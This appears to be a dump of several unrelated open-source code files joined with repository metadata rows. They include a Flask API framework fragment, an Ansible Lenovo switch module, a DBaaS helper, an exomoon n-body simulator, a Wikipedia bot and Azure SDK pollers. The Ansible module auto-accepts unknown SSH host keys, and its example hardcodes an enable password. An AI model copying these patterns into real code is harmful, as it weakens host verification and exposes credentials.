# logging parameters
self.url_params = self.validate_url(**kwargs)
self.params = self.validate_input()
remote_addr = request.remote_addr or 'localhost'
request_method = request.environ.get('REQUEST_METHOD')
path_info = request.environ.get('PATH_INFO')
request_logger.debug(
'Request: %s %s %s %s',
remote_addr, request_method, path_info, unicode(self.params)
)
if hasattr(self, 'setup'):
self.setup(*args, **kwargs)
return self.process_request(*args, **kwargs)
def __init__(self, resource=None, method='get'):
self.resource = resource
@property
def combined_params(self):
params = copy.deepcopy(getattr(self, 'params', {}))
url_params = getattr(self, 'url_params', {})
params.update(url_params)
return params
def _map_fields(self, params):
for (param_name, field_name) in self.field_map:
# ignore params in our map not supplied in the API call
if param_name not in params:
continue
# we'll also change the value accordingly
func = self.field_name[(param_name, field_name)]
# add the new value back in, removing the old
params[field_name] = func(params[param_name])
del params[param_name]
return params
def _combine_schema(self, attr_name='schema'):
resource_schema = getattr(self.resource, attr_name, None)
operation_schema = getattr(self, attr_name, None)
# Merge combined schemas, preferring the operation_schema settings and fields
if resource_schema and operation_schema:
schema = copy.deepcopy(operation_schema)
for field in resource_schema.fields:
if not field in schema.fields:
schema.add_field(field, resource_schema.fields[field])
else:
schema = resource_schema or operation_schema
return schema or Schema()
def validate_url(self, *args, **kwargs):
schema = self._combine_schema('url_schema')
if not schema: # pragma: no cover
return {}
try:
return schema.to_python(kwargs)
except Invalid as e:
if e.error_dict:
failures = {}
for field in e.error_dict:
failures[field] = e.error_dict[field].msg
else:
failures = {"unknown": e.msg} # pragma: no cover
raise APIValidationException(status_library.API_INPUT_VALIDATION_FAILED, failures)
def validate_input(self):
schema = self._combine_schema('schema')
try:
params = schema.to_python(self.resource.get_parameters())
except Invalid as e:
if e.error_dict:
failures = {}
for field in e.error_dict:
failures[field] = e.error_dict[field].msg
else:
failures = {"unknown": e.msg} # pragma: no cover
raise APIValidationException(status_library.API_INPUT_VALIDATION_FAILED, failures)
return self._map_fields(params)
def process_request(self, *args, **kwargs):
pass
class APIModelOperation(APIOperation):
@property
def model(self):
return self.resource.model
def get_base_query(self, **kwargs):
'''Obtains the base query for a model-based operation.'''
all_params = kwargs
all_params.update(self.combined_params)
return self.resource.get_base_query(**all_params)
def fetch(self, **kwargs):
item_id = self.combined_params.get(self.resource.object_id_param, None)
id_column = getattr(self, 'id_column', 'id')
column = getattr(self.model, id_column)
item = self.get_base_query(**kwargs).filter(column == item_id).first()
if item is None:
raise status_library.exception(
'API_DATABASE_RESOURCE_NOT_FOUND',
resource=self.resource.model.__tablename__
)
return item
class UnimplementedOperation(APIOperation):
def __call__(self, *args, **kwargs):
raise status_library.API_CODE_NOT_IMPLEMENTED
class APIResource(Resource):
route = None
model = None
read_only = True
object_id_param = None
endpoint = None
create = UnimplementedOperation()
retrieve = UnimplementedOperation()
update = UnimplementedOperation()
remove = UnimplementedOperation()
list = UnimplementedOperation()
#def __repr__(self):
# methods = ['create', 'retrieve', 'update', 'remove', 'list']
# noop = UnimplementedOperation()
# return "<%s [%s: %s]>" % (
# self.__cls__.__name__,
# self.route,
# ', '.join([
# method for method in methods
# if getattr(self, method) is not noop
# ])
# )
@classmethod
def get_parameters(cls):
def purge_oauth_keys(params):
return {k: params[k] for k in filter(lambda item: not re.match(r'^oauth_', item), params)}
from flask import request
if request.method == 'GET':
return purge_oauth_keys(request.args)
elif request.json:
return purge_oauth_keys(request.json)
elif request.form:
return purge_oauth_keys(request.form)
else:
# TODO: is this case even needed?
return purge_oauth_keys(
json.JSONDecoder().decode(request.stream.read())
)
@classmethod
def method(self, method, endpoint=None):
'''
Decorator to bind a callable as the handler for a method.
It sets the resource property on the callable to be the parent resource.
'''
def wrapper(cls, *args, **kwargs):
cls.resource = self
setattr(self, method, cls(resource=self))
return cls
return wrapper
def get(self, **kwargs):
if self.object_id_param in kwargs:
return self.retrieve(**kwargs)
return self.list(**kwargs)
def post(self, **kwargs):
if self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't POST with arguments in URL
if self.read_only:
abort(405)
return self.create(**kwargs)
def put(self, **kwargs):
if not self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't PUT without arguments (that may have an ID)
if self.read_only:
abort(405)
return self.update(**kwargs)
def delete(self, **kwargs):
if not self.object_id_param in kwargs:
raise status_library.API_RESOURCE_NOT_FOUND # Can't DELETE without arguments (that may have an ID)
if self.read_only:
abort(405)
return self.remove(**kwargs)
@classmethod
def get_base_query(self, **kwargs):
model = self.model
query = model.query
return query
class base_parameter(object):
schema_property = 'schema'
def __init__(self, field, validator, description):
self.field = field
if isinstance(validator, Validator):
self.validator = validator
else:
self.validator = validator()
self.validator.__doc__ = description
def __call__(self, klass):
if not hasattr(klass, self.schema_property):
schema = Schema()
else:
schema = copy.deepcopy(getattr(klass, self.schema_property))
schema.add_field(self.field, self.validator)
setattr(klass, self.schema_property, schema)
return klass
class parameter(base_parameter):
'''Binds a formencode validator to the schema in either a APIResource or APIOperation.
If the Schema is not yet present, one is created.
The ``required`` and ``default`` named parameters can be used as shortcuts to modify the
``validator`` as if_missing=default and not_empty=required.
Example:
@parameter("id", validator=formencode.validators.Int(), description="Unique ID of object", required=True, default=None)
'''
def __init__(self, field, validator, description, required=None, default=None):
super(parameter, self).__init__(field, validator, description)
if required is not None:
self.validator.not_empty = required
if default is not None:
self.validator.if_missing = default
class url_parameter(base_parameter):
'''Binds a formencode validator to the url_schema in either a APIResource or APIOperation.
If the URL Schema is not yet present, one is created.
All validators added to the schema this way have not_empty=True (as they are mandatory).
Example:
@url_parameter("id", validator=formencode.validators.Int(), description="Unique ID of object")
'''
schema_property = 'url_schema'
| mit | 7,188,259,168,814,752,000 | 33.09894 | 123 | 0.607254 | false |
tsdmgz/ansible | lib/ansible/modules/network/cnos/cnos_conditional_command.py | 1 | 7325 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to send Conditional CLI commands to Lenovo Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cnos_conditional_command
author: "Dave Kasberg (@dkasberg)"
short_description: Execute a single command based on condition on devices running Lenovo CNOS
description:
- This module allows you to modify the running configuration of a switch. It provides a way to
execute a single CNOS command on a network device by evaluating the current running configuration
and executing the command only if the specific settings have not been already configured.
The CNOS command is passed as an argument of the method.
This module functions the same as the cnos_command module.
The only exception is that the following inventory variable can be specified
["condition = <flag string>"]
When this inventory variable is specified as the variable of a task, the command is executed for
the network element that matches the flag string. Usually, commands are executed across a group
of network devices. When there is a requirement to skip the execution of the command on one or
more devices, it is recommended to use this module.
This module uses SSH to manage network device configuration.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit U(http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_conditional_command.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options:
clicommand:
description:
- This specifies the CLI command as an attribute to this method. The command is passed using
double quotes. The variables can be placed directly on to the CLI commands or can be invoked
from the vars directory.
required: true
default: Null
condition:
description:
- If you specify condition=false in the inventory file against any device, the command execution
is skipped for that device.
required: true
default: Null
flag:
description:
- If a task needs to be executed, you have to set the flag the same as it is specified in the
inventory for that device.
required: true
default: Null
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_conditional_command. These are written in the main.yml file of the tasks directory.
---
- name: Applying CLI template on VLAG Tier1 Leaf Switch1
cnos_conditional_command:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
outputfile: "./results/test_conditional_command_{{ inventory_hostname }}_output.txt"
condition: "{{ hostvars[inventory_hostname]['condition']}}"
flag: leaf_switch2
command: "spanning-tree mode enable"
enablePassword: "anil"
'''
RETURN = '''
msg:
description: Success or failure message
returned: always
type: string
sample: "Command Applied"
'''
import sys
try:
import paramiko
HAS_PARAMIKO = True
except ImportError:
HAS_PARAMIKO = False
import time
import socket
import array
import json
import time
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
module = AnsibleModule(
argument_spec=dict(
clicommand=dict(required=True),
outputfile=dict(required=True),
condition=dict(required=True),
flag=dict(required=True),
host=dict(required=True),
deviceType=dict(required=True),
username=dict(required=True),
password=dict(required=True, no_log=True),
enablePassword=dict(required=False, no_log=True), ), supports_check_mode=False)
username = module.params['username']
password = module.params['password']
enablePassword = module.params['enablePassword']
condition = module.params['condition']
flag = module.params['flag']
cliCommand = module.params['clicommand']
outputfile = module.params['outputfile']
deviceType = module.params['deviceType']
hostIP = module.params['host']
output = ""
if not HAS_PARAMIKO:
module.fail_json(msg='paramiko is required for this module')
if (condition != flag):
module.exit_json(changed=True, msg="Command Skipped for this value")
return " "
# Create instance of SSHClient object
remote_conn_pre = paramiko.SSHClient()
# Automatically add untrusted hosts (make sure okay for security policy in your environment)
remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# initiate SSH connection with the switch
remote_conn_pre.connect(hostIP, username=username, password=password)
time.sleep(2)
# Use invoke_shell to establish an 'interactive session'
remote_conn = remote_conn_pre.invoke_shell()
time.sleep(2)
# Enable and enter configure terminal then send command
#
# Enable and enter configure terminal then send command
output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
# Make terminal length = 0
output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
# Go to config mode
output = output + cnos.waitForDeviceResponse("configure d\n", "(config)#", 2, remote_conn)
# Send the CLi command
output = output + cnos.waitForDeviceResponse(cliCommand + "\n", "(config)#", 2, remote_conn)
# Save it into the file
file = open(outputfile, "a")
file.write(output)
file.close()
# Logic to check when changes occur or not
errorMsg = cnos.checkOutputForError(output)
if(errorMsg is None):
module.exit_json(changed=True, msg="CLI Command executed and results saved in file ")
else:
module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
| gpl-3.0 | -3,509,905,239,353,352,700 | 36.953368 | 150 | 0.694608 | false |
globocom/database-as-a-service | dbaas/notification/management/arguments/factory.py | 1 | 4756 | class ArgumentsTo(object):
KEY = ''
def __init__(self, args):
self.args = args
def build(self):
raise NotImplementedError
@property
def database_name(self):
return self.args['database'].name
def get_database_arg(self):
return "Database: {}".format(self.database_name)
def get_environment_arg(self):
return "Environment: {}".format(self.args['environment'])
def get_plan_arg(self):
return "Plan: {}".format(self.args['plan'])
def get_project_arg(self):
return "Project: {}".format(self.args['project'])
def get_user_arg(self):
return "User: {}".format(self.args['user'])
def get_clone_arg(self):
return "Clone: {}".format(self.args['clone_name'])
class ArgumentsToCreateDatabase(ArgumentsTo):
KEY = 'notification.tasks.create_database'
def build(self):
return [
self.get_database_arg(),
self.get_environment_arg(),
self.get_project_arg(),
self.get_plan_arg(),
]
@property
def database_name(self):
return self.args['name']
class ArgumentsToResizeDatabase(ArgumentsTo):
KEY = 'notification.tasks.resize_database'
def build(self):
return [
self.get_database_arg(),
"New VM Offering: {}".format(self.args['offering']),
]
class ArgumentsToUpgradeDatabase(ArgumentsTo):
KEY = 'notification.tasks.upgrade_database'
def build(self):
return [
self.get_database_arg(),
"Target plan: {}".format(
self.args['database'].databaseinfra.plan.engine_equivalent_plan
),
]
class ArgumentsToUpgradeDatabasePatch(ArgumentsTo):
KEY = 'notification.tasks.upgrade_database_patch'
def build(self):
return [
self.get_database_arg(),
"New patch: {}".format(self.args['patch']),
]
class ArgumentsToReinstallVM(ArgumentsTo):
KEY = 'notification.tasks.reinstall_vm'
def build(self):
return [
self.get_database_arg(),
"Instance: {}".format(
self.args['instance']
),
]
class ArgumentsToDiskResize(ArgumentsTo):
KEY = 'notification.tasks.database_disk_resize'
def build(self):
return [
self.get_database_arg(),
"New Disk Offering: {}".format(self.args['disk_offering']),
]
class ArgumentsToRestoreSnapshot(ArgumentsTo):
KEY = 'backup.tasks.restore_snapshot'
def build(self):
return [
self.get_database_arg(),
"Description: Restoring to an older version. It will finish soon.",
]
class ArgumentsToDestroyDatabase(ArgumentsTo):
KEY = 'notification.tasks.destroy_database'
def build(self):
return [
self.get_database_arg(),
self.get_user_arg(),
]
class ArgumentsToCloneDatabase(ArgumentsTo):
KEY = 'notification.tasks.clone_database'
def build(self):
return [
self.get_database_arg(),
self.get_clone_arg(),
self.get_environment_arg(),
self.get_plan_arg(),
]
@property
def database_name(self):
return self.args['origin_database'].name
class ArgumentsToAnalyzeDatabases(ArgumentsTo):
KEY = 'dbaas_services.analyzing.tasks.analyze.analyze_databases'
def build(self):
return [
"Description: Analyzing all databases",
]
class ArgumentsToUpgradeMongo24To30(ArgumentsTo):
KEY = 'notification.tasks.upgrade_mongodb_24_to_30'
def build(self):
return [
self.get_database_arg(),
]
class ArgumentsToUnbindAddress(ArgumentsTo):
KEY = 'dbaas_aclapi.tasks.unbind_address_on_database'
def build(self):
return [
"Removing Binds For: {}".format(self.args['database_bind']),
self.get_database_arg(),
]
@property
def database_name(self):
return self.args['database_bind'].database.name
class ArgumentsToBindAddress(ArgumentsTo):
KEY = 'dbaas_aclapi.tasks.bind_address_on_database'
def build(self):
return [
"Creating Binds For: {}".format(self.args['database_bind']),
self.get_database_arg(),
]
@property
def database_name(self):
return self.args['database_bind'].database.name
class ArgumentsToRemoveReadOnlyInstance(ArgumentsTo):
KEY = 'notification.tasks.remove_readonly_instance'
def build(self):
return [
"Removing read only instance from {}".format(self.get_database_arg()),
"Instance: {}".format(self.args['instance'])
]
| bsd-3-clause | 1,724,527,907,496,791,300 | 24.031579 | 82 | 0.597351 | false |
hippke/TTV-TDV-exomoons | create_figures/system_20.py | 1 | 7712 | """n-body simulator to derive TDV+TTV diagrams of planet-moon configurations.
Credit for part of the source is given to
https://github.com/akuchling/50-examples/blob/master/gravity.rst
Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License
"""
import numpy
import math
import matplotlib.pylab as plt
from modified_turtle import Turtle
from phys_const import *
class Body(Turtle):
"""Subclass of Turtle representing a gravitationally-acting body"""
name = 'Body'
vx = vy = 0.0 # velocities in m/s
px = py = 0.0 # positions in m
def attraction(self, other):
"""(Body): (fx, fy) Returns the force exerted upon this body by the other body"""
# Distance of the other body
sx, sy = self.px, self.py
ox, oy = other.px, other.py
dx = (ox-sx)
dy = (oy-sy)
d = math.sqrt(dx**2 + dy**2)
# Force f and direction to the body
f = G * self.mass * other.mass / (d**2)
theta = math.atan2(dy, dx)
# direction of the force
fx = math.cos(theta) * f
fy = math.sin(theta) * f
return fx, fy
def loop(bodies, orbit_duration):
"""([Body]) Loops and updates the positions of all the provided bodies"""
# Calculate the duration of our simulation: One full orbit of the outer moon
seconds_per_day = 24*60*60
timesteps_per_day = 1000
timestep = seconds_per_day / timesteps_per_day
total_steps = int(orbit_duration / 3600 / 24 * timesteps_per_day)
#print total_steps, orbit_duration / 24 / 60 / 60
for body in bodies:
body.penup()
body.hideturtle()
for step in range(total_steps):
for body in bodies:
if body.name == 'planet':
# Add current position and velocity to our list
tdv_list.append(body.vx)
ttv_list.append(body.px)
force = {}
for body in bodies:
# Add up all of the forces exerted on 'body'
total_fx = total_fy = 0.0
for other in bodies:
# Don't calculate the body's attraction to itself
if body is other:
continue
fx, fy = body.attraction(other)
total_fx += fx
total_fy += fy
# Record the total force exerted
force[body] = (total_fx, total_fy)
# Update velocities based upon on the force
for body in bodies:
fx, fy = force[body]
body.vx += fx / body.mass * timestep
body.vy += fy / body.mass * timestep
# Update positions
body.px += body.vx * timestep
body.py += body.vy * timestep
#body.goto(body.px*SCALE, body.py*SCALE)
#body.dot(3)
def run_sim(R_star, transit_duration, bodies):
"""Run 3-body sim and convert results to TTV + TDV values in [minutes]"""
# Run 3-body sim for one full orbit of the outermost moon
loop(bodies, orbit_duration)
# Move resulting data from lists to numpy arrays
ttv_array = numpy.array([])
ttv_array = ttv_list
tdv_array = numpy.array([])
tdv_array = tdv_list
# Zeropoint correction
middle_point = numpy.amin(ttv_array) + numpy.amax(ttv_array)
ttv_array = numpy.subtract(ttv_array, 0.5 * middle_point)
ttv_array = numpy.divide(ttv_array, 1000) # km/s
# Compensate for barycenter offset of planet at start of simulation:
planet.px = 0.5 * (gravity_firstmoon + gravity_secondmoon)
stretch_factor = 1 / ((planet.px / 1000) / numpy.amax(ttv_array))
ttv_array = numpy.divide(ttv_array, stretch_factor)
# Convert to time units, TTV
ttv_array = numpy.divide(ttv_array, R_star)
ttv_array = numpy.multiply(ttv_array, transit_duration * 60 * 24) # minutes
# Convert to time units, TDV
oldspeed = (2 * R_star / transit_duration) * 1000 / 24 / 60 / 60 # m/sec
newspeed = oldspeed - numpy.amax(tdv_array)
difference = (transit_duration - (transit_duration * newspeed / oldspeed)) * 24 * 60
conversion_factor = difference / numpy.amax(tdv_array)
tdv_array = numpy.multiply(tdv_array, conversion_factor)
return ttv_array, tdv_array
"""Main routine"""
# Set variables and constants. Do not change these!
G = 6.67428e-11 # Gravitational constant G
SCALE = 5e-07 # [px/m] Only needed for plotting during nbody-sim
tdv_list = []
ttv_list = []
R_star = 6.96 * 10**5 # [km], solar radius
transit_duration = (2*pi/sqrt(G*(M_sun+M_jup)/a_jup**3)*R_sun/(pi*a_jup)*sqrt((1+R_jup/R_sun)**2))/60/60/24 # transit duration without a moon, Eq. (C1) Kipping (2009b, MNRAS), for q = 0
print transit_duration
planet = Body()
planet.name = 'planet'
planet.mass = M_jup
#semimajor_axis = 1. * AU #[m]
semimajor_axis = a_jup
stellar_mass = M_sun
radius_hill = semimajor_axis * (planet.mass / (3 * (stellar_mass))) ** (1./3)
# Define parameters
firstmoon = Body()
firstmoon.mass = M_gan
firstmoon.px = 0.4218 * 10**9
secondmoon = Body()
secondmoon.mass = M_gan
secondmoon.px = 0.48945554 * 10**9
thirdmoon = Body()
thirdmoon.mass = M_gan
thirdmoon.px = 0.59293316 * 10**9
fourthmoon = Body()
fourthmoon.mass = M_gan
fourthmoon.px = 1.23335068 * 10**9
# Calculate start velocities
firstmoon.vy = math.sqrt(G * planet.mass * (2 / firstmoon.px - 1 / firstmoon.px))
secondmoon.vy = math.sqrt(G * planet.mass * (2 / secondmoon.px - 1 / secondmoon.px))
thirdmoon.vy = math.sqrt(G * planet.mass * (2 / thirdmoon.px - 1 / thirdmoon.px))
fourthmoon.vy = math.sqrt(G * planet.mass * (2 / fourthmoon.px - 1 / fourthmoon.px))
planet.vy = (-secondmoon.vy * secondmoon.mass - firstmoon.vy * firstmoon.mass) / planet.mass
# Calculate planet displacement. This holds for circular orbits
gravity_firstmoon = (firstmoon.mass / planet.mass) * firstmoon.px
gravity_secondmoon = (secondmoon.mass / planet.mass) * secondmoon.px
gravity_thirdmoon = (thirdmoon.mass / planet.mass) * thirdmoon.px
gravity_fourthmoon = (fourthmoon.mass / planet.mass) * fourthmoon.px
planet.px = 0.5 * (gravity_firstmoon + gravity_secondmoon + gravity_thirdmoon + gravity_fourthmoon)
# Use the outermost moon to calculate the length of one full orbit duration
orbit_duration = math.sqrt((4 * math.pi**2 *fourthmoon.px ** 3) / (G * (fourthmoon.mass + planet.mass)))
orbit_duration = orbit_duration * 1.002
# Run simulation. Make sure to add/remove the moons you want to simulate!
ttv_array, tdv_array = run_sim(
R_star,
transit_duration,
[planet, firstmoon, secondmoon, thirdmoon, fourthmoon])
# Output information
print 'TTV amplitude =', numpy.amax(ttv_array), \
'[min] = ', numpy.amax(ttv_array) * 60, '[sec]'
print 'TDV amplitude =', numpy.amax(tdv_array), \
'[min] = ', numpy.amax(tdv_array) * 60, '[sec]'
ax = plt.axes()
plt.plot(ttv_array, tdv_array, color = 'k')
plt.rc('font', **{'family': 'serif', 'serif': ['Computer Modern']})
plt.rc('text', usetex=True)
plt.tick_params(axis='both', which='major', labelsize = 16)
plt.xlabel('transit timing variation [minutes]', fontsize = 16)
plt.ylabel('transit duration variation [minutes]', fontsize = 16)
ax.tick_params(direction='out')
plt.ylim([numpy.amin(tdv_array) * 1.2, numpy.amax(tdv_array) * 1.2])
plt.xlim([numpy.amin(ttv_array) * 1.2, numpy.amax(ttv_array) * 1.2])
plt.plot((0, 0), (numpy.amax(tdv_array) * 10., numpy.amin(tdv_array) * 10.), 'k', linewidth=0.5)
plt.plot((numpy.amin(ttv_array) * 10., numpy.amax(ttv_array) * 10.), (0, 0), 'k', linewidth=0.5)
# Fix axes for comparison with eccentric moon
plt.xlim(-0.11, +0.11)
plt.ylim(-0.8, +0.8)
plt.annotate(r"5:4:3:1", xy=(-0.105, +0.7), size=16)
plt.savefig("fig_system_20.eps", bbox_inches = 'tight')
| mit | -120,625,737,298,135,980 | 34.539171 | 185 | 0.638485 | false |
alemela/alessiobot | script/add_immagine_orfana.py | 1 | 2591 | # -*- coding: utf-8 -*-
import pywikibot, re, subprocess
from pywikibot import pagegenerators
import time, sys
start = time.clock()
args = pywikibot.handleArgs()
site = pywikibot.Site('it', 'wikipedia')
today = time.strftime("%Y%m%d")
if sys.argv[1] == "immagini_orfane_libere":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_libere/'+today+'.txt'
template = u'{{Immagine orfana|libera}}'
comment = u'Bot: immagine orfana con licenza libera'
elif sys.argv[1] == "immagini_orfane_non_libere":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_non_libere/'+today+'.txt'
template = u'{{Immagine orfana|non libera}}'
comment = u'Bot: immagine orfana con licenza non libera'
elif sys.argv[1] == "immagini_orfane_pd_italia":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_pd_italia/'+today+'.txt'
template = u'{{Immagine orfana|PD-Italia}}'
comment = u'Bot: immagine orfana con licenza PD italia'
elif sys.argv[1] == "immagini_orfane_sconosciute":
path = '/data/project/alessiobot/data/immagini_orfane/immagini_orfane_sconosciute/'+today+'.txt'
template = u'{{Immagine orfana}}'
comment = u'Bot: immagine orfana con licenza sconosciuta'
else:
print "Unvalid type of licence"
exit()
has_template = r'\{\{(?:template:|)(immagine_orfana)[\|\}]'
def main():
add_lists = pagegenerators.TextfilePageGenerator(path)
for page in add_lists:
# Check if the page exists or if there's already the template
try:
oldtxt = page.get()
except pywikibot.NoPage:
pywikibot.output(u"%s doesn't exist! Skip" % page.title())
continue
except pywikibot.IsRedirectPage:
pywikibot.output(u"%s is redirect, skip" % page.title(asLink=True))
return
check_notice = re.findall(has_template, oldtxt.lower())
if check_notice != []:
pywikibot.output(u'Template alreday in %s, skip' % page.title())
continue
# Ok, the page need the template. Let's put it there!
newtxt = u"%s\n%s" % (template, oldtxt)
try:
page.put(newtxt, comment)
pywikibot.output(u"\t\t>>> %s <<<" % page.title())
# pywikibot.output(u"editing!!!")
except pywikibot.LockedPage:
pywikibot.output(u'%s is a locked page! Skip' %page.title())
continue
except pywikibot.EditConflict:
pywikibot.output(u'Edit Conflict! Skip')
continue
if __name__ == "__main__":
try:
main()
finally:
pywikibot.stopme()
end=time.clock()
print "Run time: ", end-start
| mit | 921,331,364,314,386,600 | 34.013514 | 100 | 0.657661 | false |
Azure/azure-sdk-for-python | sdk/textanalytics/azure-ai-textanalytics/azure/ai/textanalytics/aio/_lro_async.py | 1 | 11430 | # coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import datetime
from typing import Optional
from azure.core.exceptions import HttpResponseError
from azure.core.polling import AsyncLROPoller
from azure.core.polling.base_polling import OperationFailed, BadStatus
from azure.core.polling.async_base_polling import AsyncLROBasePolling
from azure.core.polling._async_poller import PollingReturnType
_FINISHED = frozenset(["succeeded", "cancelled", "failed", "partiallycompleted"])
_FAILED = frozenset(["failed"])
_SUCCEEDED = frozenset(["succeeded", "partiallycompleted"])
class TextAnalyticsAsyncLROPollingMethod(AsyncLROBasePolling):
def finished(self):
"""Is this polling finished?
:rtype: bool
"""
return TextAnalyticsAsyncLROPollingMethod._finished(self.status())
@staticmethod
def _finished(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FINISHED
@staticmethod
def _failed(status):
if hasattr(status, "value"):
status = status.value
return str(status).lower() in _FAILED
@staticmethod
def _raise_if_bad_http_status_and_method(response):
"""Check response status code is valid.
Must be 200, 201, 202, or 204.
:raises: BadStatus if invalid status.
"""
code = response.status_code
if code in {200, 201, 202, 204}:
return
raise BadStatus(
"Invalid return status {!r} for {!r} operation".format(
code, response.request.method
)
)
async def _poll(self): # pylint:disable=invalid-overridden-method
"""Poll status of operation so long as operation is incomplete and
we have an endpoint to query.
:param callable update_cmd: The function to call to retrieve the
latest status of the long running operation.
:raises: OperationFailed if operation status 'Failed' or 'Canceled'.
:raises: BadStatus if response status invalid.
:raises: BadResponse if response invalid.
"""
while not self.finished():
await self._delay()
await self.update_status()
if TextAnalyticsAsyncLROPollingMethod._failed(self.status()):
raise OperationFailed("Operation failed or canceled")
final_get_url = self._operation.get_final_get_url(self._pipeline_response)
if final_get_url:
self._pipeline_response = await self.request_status(final_get_url)
TextAnalyticsAsyncLROPollingMethod._raise_if_bad_http_status_and_method(
self._pipeline_response.http_response
)
class AsyncAnalyzeHealthcareEntitiesLROPollingMethod(
TextAnalyticsAsyncLROPollingMethod
):
def __init__(self, *args, **kwargs):
self._text_analytics_client = kwargs.pop("text_analytics_client")
super(AsyncAnalyzeHealthcareEntitiesLROPollingMethod, self).__init__(
*args, **kwargs
)
@property
def _current_body(self):
from .._generated.v3_1.models import JobMetadata
return JobMetadata.deserialize(self._pipeline_response)
@property
def created_on(self):
if not self._current_body:
return None
return self._current_body.created_date_time
@property
def expires_on(self):
if not self._current_body:
return None
return self._current_body.expiration_date_time
@property
def last_modified_on(self):
if not self._current_body:
return None
return self._current_body.last_update_date_time
@property
def id(self):
if not self._current_body:
return None
return self._current_body.job_id
class AsyncAnalyzeHealthcareEntitiesLROPoller(AsyncLROPoller[PollingReturnType]):
def polling_method(self) -> AsyncAnalyzeHealthcareEntitiesLROPollingMethod: # type: ignore
"""Return the polling method associated to this poller."""
return self._polling_method # type: ignore
@property
def created_on(self) -> datetime.datetime:
"""When your healthcare entities job was created
:return: When your healthcare entities job was created
:rtype: ~datetime.datetime
"""
return self.polling_method().created_on
@property
def expires_on(self) -> datetime.datetime:
"""When your healthcare entities job will expire
:return: When your healthcare entities job will expire
:rtype: ~datetime.datetime
"""
return self.polling_method().expires_on
@property
def last_modified_on(self) -> datetime.datetime:
"""When your healthcare entities job was last modified
:return: When your healthcare entities job was last modified
:rtype: ~datetime.datetime
"""
return self.polling_method().last_modified_on
@property
def id(self) -> str:
"""ID of your call to :func:`begin_analyze_healthcare_entities`
:return: ID of your call to :func:`begin_analyze_healthcare_entities`
:rtype: str
"""
return self.polling_method().id
async def cancel( # type: ignore
self, **kwargs
) -> "AsyncLROPoller[None]":
"""Cancel the operation currently being polled.
:keyword int polling_interval: The polling interval to use to poll the cancellation status.
The default value is 5 seconds.
:return: Returns an instance of an AsyncLROPoller that returns None.
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError: When the operation has already reached a terminal state.
.. admonition:: Example:
.. literalinclude:: ../samples/async_samples/sample_analyze_healthcare_entities_with_cancellation_async.py
:start-after: [START analyze_healthcare_entities_with_cancellation_async]
:end-before: [END analyze_healthcare_entities_with_cancellation_async]
:language: python
:dedent: 4
:caption: Cancel an existing health operation.
"""
polling_interval = kwargs.pop("polling_interval", 5)
await self.polling_method().update_status()
try:
return await getattr(
self._polling_method, "_text_analytics_client"
).begin_cancel_health_job(
self.id,
polling=TextAnalyticsAsyncLROPollingMethod(timeout=polling_interval),
)
except HttpResponseError as error:
from .._response_handlers import process_http_response_error
process_http_response_error(error)
class AsyncAnalyzeActionsLROPollingMethod(TextAnalyticsAsyncLROPollingMethod):
@property
def _current_body(self):
from .._generated.v3_1.models import AnalyzeJobMetadata
return AnalyzeJobMetadata.deserialize(self._pipeline_response)
@property
def created_on(self):
if not self._current_body:
return None
return self._current_body.created_date_time
@property
def display_name(self):
if not self._current_body:
return None
return self._current_body.display_name
@property
def expires_on(self):
if not self._current_body:
return None
return self._current_body.expiration_date_time
@property
def actions_failed_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["failed"]
@property
def actions_in_progress_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["inProgress"]
@property
def actions_succeeded_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["completed"]
@property
def last_modified_on(self):
if not self._current_body:
return None
return self._current_body.last_update_date_time
@property
def total_actions_count(self):
if not self._current_body:
return None
return self._current_body.additional_properties["tasks"]["total"]
@property
def id(self):
if not self._current_body:
return None
return self._current_body.job_id
class AsyncAnalyzeActionsLROPoller(AsyncLROPoller[PollingReturnType]):
def polling_method(self) -> AsyncAnalyzeActionsLROPollingMethod: # type: ignore
"""Return the polling method associated to this poller."""
return self._polling_method # type: ignore
@property
